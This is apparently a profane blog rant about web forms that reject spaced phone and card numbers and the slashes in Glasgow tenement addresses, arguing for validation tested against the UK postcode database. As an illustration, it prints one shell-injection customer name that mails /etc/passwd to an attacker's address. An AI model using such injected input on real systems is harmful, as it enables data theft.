Phone number, motherfucker! Do you speak it?
There’s nothing that pisses me off quite so easily and frequently than an encounter with a web site that gets in my way because whoever wrote it didn’t think. (Or was too lazy or ignorant to care; the results are the same.)
Here I am, filling out my address details, and the web site repeatedly gets in my way. It asks me for my home phone number, so I type in 0141 339 xxxx. Or rather I try to, and then run out of room, because the genius who wrote the form thought “UK phone numbers are 12 digits, so I’ll make the form field 12 characters long”, which a) is wrong (they’re 10 or 11 digits long, assuming you don’t have to mess around with extensions), and b) is amazingly unhelpful, given that phone numbers are usually written down with spaces, and that’s how people think of them.
Perhaps there’s a reason why my credit card company has tried to make it easy for me to read my credit card number?
Stupid web designers do this with credit cards as well, and it drives me up the wall. You get out your credit card, which is typically displayed as 6759 0123 4567 8901 for convenience, so that’s how you type it in. And you get to the 8, with three digits left to type, and you realise you’ve run out of room, because the web designer thought “credit cards are 16 digits long” so only gave you space for 16 digits. Never mind that some credit cards are perfectly legitimately 19-digits long. What’s even worse is when the form gives you enough space to type a credit card with spaces in it, but if you have the nerve to do that the form complains that you’ve entered an incorrect credit card number.
For fuck’s sake, how hard is it to strip spaces from a sodding 20-odd digits text field? You should be coping with the stuff people type in rather than lecturing them on how your internal structures work. Telephone numbers in the UK consist of an area code, a space, and then one or two sets of digits, depending on how large the area is and therefore how many digits you need to give everyone a phone number. They’re printed that way, and people think of them that way. Don’t erect annoyance barriers just because you’re too lazy or incompetent to deal with one of the simplest tasks any programming language has to deal with.
Similarly, credit card numbers are divided into 3-, 4- or 6-digit chunks so you don’t have to keep the entire number in your head (which you can’t do because they’re at least 13 digits long and the brain can’t handle more than about 7±2). Which is bloody useful if you’re reading a card number to someone over the phone, or you’re looking at your card, then switching to looking at your keyboard or your screen while you type; you only have to worry about the particular group of 3-6 digits you’re telling someone, or typing.
Cargo-cult developers all live in houses or main-door flats, apparently
But this isn’t the worst sin. I can, after all, enter my credit card number without spaces and it will eventually work. Abbey National’s website goes one better by refusing to acknowledge my address in any shape or form.
I live in Glasgow, in a tenement flat, and as such my address looks like “2/2 23 Street Name, Glasgow G12 nXX”. I’m betting none of the people who wrote the website’s data validation code live at such an address, because if I try and enter my address, the website complains that it’s incorrect. The worst thing is, I’m almost certain I know why they’re saying this: because they think that slashes (‘/’) are inherently evil.
Now, to be sure, there is a danger in blithely trusting anything you’re given. Suppose someone’s signing up for your latest online thingy, and you want to make sure they’re not already a customer of your old creaky legacy system because otherwise the sales guys will go through your customer database and get huge commissions but the company doesn’t actually gain new customers. So you’ve got a customer name, let’s call it $cust_name because that’s how programmers talk, and you decide to run the system command check_customer --name "$cust_name". That works fine until a malicious attacker guesses that you’re doing something like this, and through trial and error comes up with the baroque customer name John Smith"; cat /etc/passwd | mail l33th4xx0rdud3@gmail.com; " and suddenly you’ve found your program tricked into emailing the contents of your list of users to someone who almost certainly is up to no good.
(Yes, yes, these days /etc/passwd is pretty much useless to an attacker, but it’s the standard example, and it’s more readable than the almost line-noise involved in installing a root-kit on a machine.)
Cross-site scripting (called XSS so not to conflict with Cascading Style Sheets) and SQL injection (e.g. this notorious xkcd webcomic) are pretty much the same thing: if you’re going to take something someone typed on the Internet and assume that it won’t cause problems, eventually you’re going to find yourself dead wrong and in a load of trouble.
The problem is, whoever wrote the web form at Abbey National had clearly heard of the idea of validating user input and making sure you weren’t tricked into doing compromising the security of your systems; but, in true cargo-cult fashion, only dimly understood the problem, and learned the wrong lessons. What they should have learned was “don’t trust the user, and make sure that anything you pass to an external process is properly sanitised before use”. What they learned instead, though, was: “anyone using slashes is trying to hack the webserver”.
Maybe I should test my code before inflicting it on the poor, unsuspecting world?
But blithely assuming that slashes are evil isn’t the worst sin either. I mean, I can just say that I live in 23 Street Name rather than 2/2 23 Street Name, and assuming my postman isn’t a complete cretin I’ll still get any post you decide to send me. I told a number of French companies that I lived at 23 rather than 2/2 23, mostly because I couldn’t remember what the French was for ‘slash’, and it gets to me.
No, what lifts this particular failure into stratospheric “OMGWTFBBQ you did what now?” territory is that the same company that decides that I can’t have a slash in my address also has a complete copy of the UK postcode database. And, guess what, the UK postcode database is chock-full of addresses that contain slashes. So the solution to your problem isn’t to have some bolshy Glasgow resident on your team who tells you to stop being so fucking stupid about slashes, or who knows that Edinburgh tenement addresses tend to be e.g. ‘2f1 25 Street Name’ (there are plenty of web sites that don’t accept that either). The solution is to test your data validation code against addresses that you know for a fact to be valid, because you paid good money to the UK Government to get a complete list of them.
There are many popular software development mantras, most of which are either transparent bullshit or promoted by over-zealous afficionados as some sort of universal salvation rather than a pragmatic approach to doing your fucking job. But sometimes a startlingly good idea can emerge from all the nonsense, like, for instance, the idea that if you’re writing code to make sure that your inputs are sane, and you’ve got a metric fuckton of valid data, maybe you should set loose one against the other.
So this is really the worst sin of all: someone wrote a website that took customers’ address details, blithely decided that some things just Weren’t Allowed because of poorly-understood ideas about security, and didn’t test their code against a huge list of valid addresses that they already had.
About that sub-heading
Sturgeon’s Law, in its simplest form, goes like this: “90% of all science fiction is crud; but then, 90% of everything is crud”. It explains why whenever I say “I write the dynamic parts of websites that let you buy stuff online”, I have to say, because of incompetent mouth-breathing fucktards that wrote Abbey National’s website, “but I’m not like those morons”.
Needless to say, Abbey National aren’t getting my business.
PS: Motherfuckers!
Lloyds TSB sprung the same goddamn thing on me, except that I entered my post code, chose my address from the list, and then they complained that information submitted to their form from the goddamn UK postcode database was invalid.
Please check your entry for this address line, you’ve entered a character that is not allowed in this box. You can type in (A-Z), (a-z), (0-9), space, apostrophe (‘), hyphen (-).
Now, I’m aware that many people think that Glasgow is a terrifying shithole, but surely that’s not a reason for arbitrarily fucking over people who live in the far more refined and salubrious neighbourhood of G12?
Leave a comment